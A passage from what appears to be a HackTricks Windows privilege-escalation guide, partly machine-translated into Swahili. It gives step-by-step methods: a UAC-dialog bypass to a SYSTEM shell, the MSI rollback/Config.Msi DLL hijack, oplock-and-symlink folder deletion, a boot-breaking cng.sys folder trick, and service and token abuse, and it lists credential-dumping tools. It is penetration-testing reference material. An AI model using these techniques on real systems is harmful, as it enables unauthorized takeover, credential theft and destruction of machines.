Windows 7 SP1	7601	** link OPENED AS SYSTEM **
Windows 8		9200	** link OPENED AS SYSTEM **
Windows 8.1		9600	** link OPENED AS SYSTEM **
Windows 10 1511	10240	** link OPENED AS SYSTEM **
Windows 10 1607	14393	** link OPENED AS SYSTEM **
Windows 10 1703	15063	link NOT opened
Windows 10 1709	16299	link NOT opened

Ili kutumia udhaifu huu, ni lazima utekeleze hatua zifuatazo:

1) Right click on the HHUPD.EXE file and run it as Administrator.

2) When the UAC prompt appears, select "Show more details".

3) Click "Show publisher certificate information".

4) If the system is vulnerable, when clicking on the "Issued by" URL link, the default web browser may appear.

5) Wait for the site to load completely and select "Save as" to bring up an explorer.exe window.

6) In the address path of the explorer window, enter cmd.exe, powershell.exe or any other interactive process.

7) You now will have an "NT\AUTHORITY SYSTEM" command prompt.

8) Remember to cancel setup and the UAC prompt to return to your desktop.

From Administrator Medium to High Integrity Level / UAC Bypass

Read this to jifunze kuhusu Ngazi za Integrity:

Integrity Levels

Then soma hili kujifunza kuhusu UAC na UAC bypasses:

UAC - User Account Control

From Arbitrary Folder Delete/Move/Rename to SYSTEM EoP

The technique described in this blog post with a exploit code available here.

The attack basically consist of abusing the Windows Installer’s rollback feature to replace legitimate files with malicious ones during the uninstallation process. For this the attacker needs to create a malicious MSI installer that will be used to hijack the C:\Config.Msi folder, which will later be used by he Windows Installer to store rollback files during the uninstallation of other MSI packages where the rollback files would have been modified to contain the malicious payload.

The summarized technique is the following:

Stage 1 – Preparing for the Hijack (leave C:\Config.Msi empty)

Step 1: Install the MSI
Create an .msi that installs a harmless file (e.g., dummy.txt) in a writable folder (TARGETDIR).
Mark the installer as “UAC Compliant”, so a non-admin user can run it.
Keep a handle open to the file after install.
Step 2: Begin Uninstall
Uninstall the same .msi.
The uninstall process starts moving files to C:\Config.Msi and renaming them to .rbf files (rollback backups).
Poll the open file handle using GetFinalPathNameByHandle to detect when the file becomes C:\Config.Msi\<random>.rbf.
Step 3: Custom Syncing
The .msi includes a custom uninstall action (SyncOnRbfWritten) that:
Signals when .rbf has been written.
Then waits on another event before continuing the uninstall.
Step 4: Block Deletion of .rbf
When signaled, open the .rbf file without FILE_SHARE_DELETE — this prevents it from being deleted.
Then signal back so the uninstall can finish.
Windows Installer fails to delete the .rbf, and because it can’t delete all contents, C:\Config.Msi is not removed.
Step 5: Manually Delete .rbf
You (attacker) delete the .rbf file manually.
Now C:\Config.Msi is empty, ready to be hijacked.

At this point, trigger the SYSTEM-level arbitrary folder delete vulnerability to delete C:\Config.Msi.

Stage 2 – Replacing Rollback Scripts with Malicious Ones

Step 6: Recreate C:\Config.Msi with Weak ACLs
Recreate the C:\Config.Msi folder yourself.
Set weak DACLs (e.g., Everyone:F), and keep a handle open with WRITE_DAC.
Step 7: Run Another Install
Install the .msi again, with:
TARGETDIR: Writable location.
ERROROUT: A variable that triggers a forced failure.
This install will be used to trigger rollback again, which reads .rbs and .rbf.
Step 8: Monitor for .rbs
Use ReadDirectoryChangesW to monitor C:\Config.Msi until a new .rbs appears.
Capture its filename.
Step 9: Sync Before Rollback
The .msi contains a custom install action (SyncBeforeRollback) that:
Signals an event when the .rbs is created.
Then waits before continuing.
Step 10: Reapply Weak ACL
After receiving the .rbs created event:
The Windows Installer reapplies strong ACLs to C:\Config.Msi.
But since you still have a handle with WRITE_DAC, you can reapply weak ACLs again.

ACLs are only enforced on handle open, so you can still write to the folder.

Step 11: Drop Fake .rbs and .rbf
Overwrite the .rbs file with a fake rollback script that tells Windows to:
Restore your .rbf file (malicious DLL) into a privileged location (e.g., C:\Program Files\Common Files\microsoft shared\ink\HID.DLL).
Drop your fake .rbf containing a malicious SYSTEM-level payload DLL.
Step 12: Trigger the Rollback
Signal the sync event so the installer resumes.
A type 19 custom action (ErrorOut) is configured to intentionally fail the install at a known point.
This causes rollback to begin.
Step 13: SYSTEM Installs Your DLL
Windows Installer:
Reads your malicious .rbs.
Copies your .rbf DLL into the target location.
You now have your malicious DLL in a SYSTEM-loaded path.
Final Step: Execute SYSTEM Code
Run a trusted auto-elevated binary (e.g., osk.exe) that loads the DLL you hijacked.
Boom: Your code is executed as SYSTEM.

From Arbitrary File Delete/Move/Rename to SYSTEM EoP

The main MSI rollback technique (the previous one) assumes you can delete an entire folder (e.g., C:\Config.Msi). But what if your vulnerability only allows arbitrary file deletion ?

You could exploit NTFS internals: every folder has a hidden alternate data stream called:

C:\SomeFolder::$INDEX_ALLOCATION

Huu stream huhifadhi metadata ya index ya kabrasha.

Kwa hivyo, ikiwa utafuta ::$INDEX_ALLOCATION stream ya kabrasha, NTFS huondoa kabrasha lote kutoka kwenye mfumo wa faili.

Unaweza kufanya hivyo kwa kutumia API za kawaida za kufuta faili kama:

DeleteFileW(L"C:\\Config.Msi::$INDEX_ALLOCATION");

Hata ingawa unaitisha file delete API, it inafuta kabrasha lenyewe.

Kutoka Folder Contents Delete hadi SYSTEM EoP

Je, vipi ikiwa primitive yako hairuhusu kufuta faili/kabrasha yoyote, lakini inaruhusu kufutwa kwa yaliyomo ya kabrasha linalodhibitiwa na mshambuliaji?

Hatua 1: Tengeneza kabrasha la mtego na faili

Create: C:\temp\folder1
Inside it: C:\temp\folder1\file1.txt

Hatua 2: Weka oplock kwenye file1.txt

The oplock inasitisha utekelezaji wakati mchakato wenye vibali unajaribu kufuta file1.txt.

// pseudo-code
RequestOplock("C:\\temp\\folder1\\file1.txt");
WaitForDeleteToTriggerOplock();

Hatua 3: Kuchochea mchakato wa SYSTEM (mfano, SilentCleanup)

Mchakato huu unachunguza folda (mfano, %TEMP%) na kujaribu kufuta yaliyomo ndani yake.
Inapofika kwenye file1.txt, oplock triggers na inatoa udhibiti kwa callback yako.

Hatua 4: Ndani ya oplock callback – elekeza upya mchakato wa kufuta

Chaguo A: Hamisha file1.txt mahali pengine
Hii inaacha folder1 tupu bila kuvunja oplock.
Usifute file1.txt moja kwa moja — hilo litaruhusu oplock kuachiliwa mapema.
Chaguo B: Geuza folder1 kuwa junction:

# folder1 is now a junction to \RPC Control (non-filesystem namespace)
mklink /J C:\temp\folder1 \\?\GLOBALROOT\RPC Control

Chaguo C: Unda symlink katika \RPC Control:

# Make file1.txt point to a sensitive folder stream
CreateSymlink("\\RPC Control\\file1.txt", "C:\\Config.Msi::$INDEX_ALLOCATION")

Hii inalenga mtiririko wa ndani wa NTFS unaohifadhi metadata ya folda — kuifuta kunaufuta folda.

Hatua 5: Toa oplock

Mchakato wa SYSTEM unaendelea na unajaribu kufuta file1.txt.
Lakini sasa, kutokana na junction + symlink, kwa kweli inafuta:

C:\Config.Msi::$INDEX_ALLOCATION

Result: C:\Config.Msi imefutwa na SYSTEM.

Kutoka Arbitrary Folder Create hadi Permanent DoS

Tumia primitive inayokuruhusu kuunda folda yoyote kama SYSTEM/admin — hata kama huwezi kuandika faili au kuweka ruhusa dhaifu.

Tengeneza folda (sio faili) yenye jina la driver muhimu wa Windows, e.g.:

C:\Windows\System32\cng.sys

Njia hii kawaida inalingana na dereva ya kernel-mode cng.sys.
Ikiwa utaunda awali kama folda, Windows itashindwa kupakia dereva halisi wakati wa boot.
Kisha, Windows inajaribu kupakia cng.sys wakati wa boot.
Inaona folda, inashindwa kutatua dereva halisi, na inadhuru au kusitisha uanzishaji (boot).
Hakuna mbadala, na hakuna uokoaji bila uingiliaji wa nje (mf., kurekebisha boot au upatikanaji wa diski).

Kutoka High Integrity hadi SYSTEM

Huduma mpya

Ikiwa tayari unafanya kazi kwenye mchakato wa High Integrity, njia hadi SYSTEM inaweza kuwa rahisi kwa kuunda na kutekeleza huduma mpya:

sc create newservicename binPath= "C:\windows\system32\notepad.exe"
sc start newservicename

Tip

Unapotengeneza service binary hakikisha ni service halali au kwamba binary inafanya vitendo vinavyohitajika haraka kwani itauawa baada ya 20s ikiwa sio service halali.

AlwaysInstallElevated

Kutoka kwa High Integrity process unaweza kujaribu kuwezesha AlwaysInstallElevated registry entries na kusakinisha reverse shell kwa kutumia wrapper ya .msi.
Taarifa zaidi kuhusu vifunguo vya rejista zinazohusika na jinsi ya kusakinisha kifurushi .msi hapa.

High + SeImpersonate privilege to System

Unaweza kupata msimbo hapa.

From SeDebug + SeImpersonate to Full Token privileges

Ikiwa una token privileges hizo (labda utazipata katika tayari High Integrity process), utaweza kufungua karibu mchakato wowote (si processes zilizolindwa) kwa kutumia ruhusa za SeDebug, kunakili token ya mchakato, na kuunda mchakato wowote kwa kutumia token hiyo.
Kutumia mbinu hii kwa kawaida huhitajika kuchagua mchakato lolote unaoendesha kama SYSTEM na token privileges zote (ndio, unaweza kupata SYSTEM processes zisizo na token privileges zote).
Unaweza kupata mfano wa msimbo unaotekeleza mbinu iliyopendekezwa hapa.

Named Pipes

Mbinu hii inatumiwa na meterpreter kupandisha hadhi katika getsystem. Mbinu inajumuisha kuunda a pipe na kisha kuunda/kuabusu service ili kuandika kwenye pipe hiyo. Kisha, server aliyounda pipe kwa kutumia ruhusa ya SeImpersonate atakuwa na uwezo wa kuiga token ya mteja wa pipe (service) akipata ruhusa za SYSTEM.
Ikiwa unataka kujifunza zaidi kuhusu name pipes usome hii.
Ikiwa unataka kusoma mfano wa jinsi ya kutoka high integrity hadi System ukitumia name pipes soma hii.

Dll Hijacking

Ikiwa utafanikiwa kuhijack a dll inayopakiwa na process inayoendesha kama SYSTEM utakuwa na uwezo wa kutekeleza arbitrary code kwa ruhusa hizo. Kwa hiyo Dll Hijacking pia ni muhimu kwa aina hii ya privilege escalation, na, zaidi ya hayo, ni rahisi zaidi kufikiwa kutoka kwa high integrity process kwani itakuwa na write permissions kwenye folda zinazotumika kupakia dlls.
Unaweza kujifunza zaidi kuhusu Dll hijacking hapa.

From Administrator or Network Service to System

From LOCAL SERVICE or NETWORK SERVICE to full privs

Soma: https://github.com/itm4n/FullPowers

Msaada zaidi

Static impacket binaries

Zana zenye manufaa

Chombo bora kutafuta Windows local privilege escalation vectors: WinPEAS

PrivescCheck
PowerSploit-Privesc(PowerUP) – Angalia misconfigurations na faili zenye nyeti (angalia hapa). Imetambuliwa.
JAWS – Angalia baadhi ya misconfigurations zinazoweza kutokea na kukusanya taarifa (angalia hapa).
privesc – Angalia misconfigurations
SessionGopher – Huteka taarifa za vikao vilivyohifadhiwa vya PuTTY, WinSCP, SuperPuTTY, FileZilla, na RDP. Tumia -Thorough kwa local.
Invoke-WCMDump – Huteka credentials kutoka Credential Manager. Imetambuliwa.
DomainPasswordSpray – Tumia nywila zilizokusanywa kwa domain
Inveigh – Inveigh ni zana ya PowerShell ya ADIDNS/LLMNR/mDNS/NBNS spoofing na man-in-the-middle.
WindowsEnum – Orodhesha msingi kwa ajili ya privesc Windows
~~Sherlock~~ ~~~~ – Tafuta udhaifu za privesc zinazojulikana (IMEPITWA NA WAKATI kwa Watson)
~~WINspect~~ – Ukaguzi wa lokal (Inahitaji haki za Admin)

Exe

Watson – Tafuta udhaifu za privesc zinazojulikana (inahitaji kucompile kutumia VisualStudio) (precompiled)
SeatBelt – Inaorodhesha host ikitafuta misconfigurations (ni zaidi zana ya kukusanya taarifa kuliko privesc) (inahitaji kucompile) (precompiled)
LaZagne – Huteka credentials kutoka kwa programu nyingi (exe iliyotayarishwa kwenye github)
SharpUP – Port ya PowerUp kwa C#
~~Beroot~~ ~~~~ – Angalia misconfiguration (executable tayari imejengwa kwenye github). Haipendekezwi. Haifanyi kazi vizuri kwenye Win10.
~~Windows-Privesc-Check~~ – Angalia misconfigurations zinazowezekana (exe kutoka python). Haipendekezwi. Haifanyi kazi vizuri kwenye Win10.

Bat

winPEASbat – Zana iliyotengenezwa kwa kuzingatia chapisho hili (haihitaji accesschk kufanya kazi vizuri lakini inaweza kuitumia).

Local

Windows-Exploit-Suggester – Inasoma matokeo ya systeminfo na kupendekeza exploits zinazofanya kazi (python ya local)
Windows Exploit Suggester Next Generation – Inasoma matokeo ya systeminfo na kupendekeza exploits zinazofanya kazi (python ya local)

Meterpreter

multi/recon/local_exploit_suggestor

Lazima ukusanye project ukitumia toleo sahihi la .NET (angalia hii). Ili kuona toleo la .NET lililosanikishwa kwenye host wa mhanga unaweza kufanya:

C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line

Marejeleo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.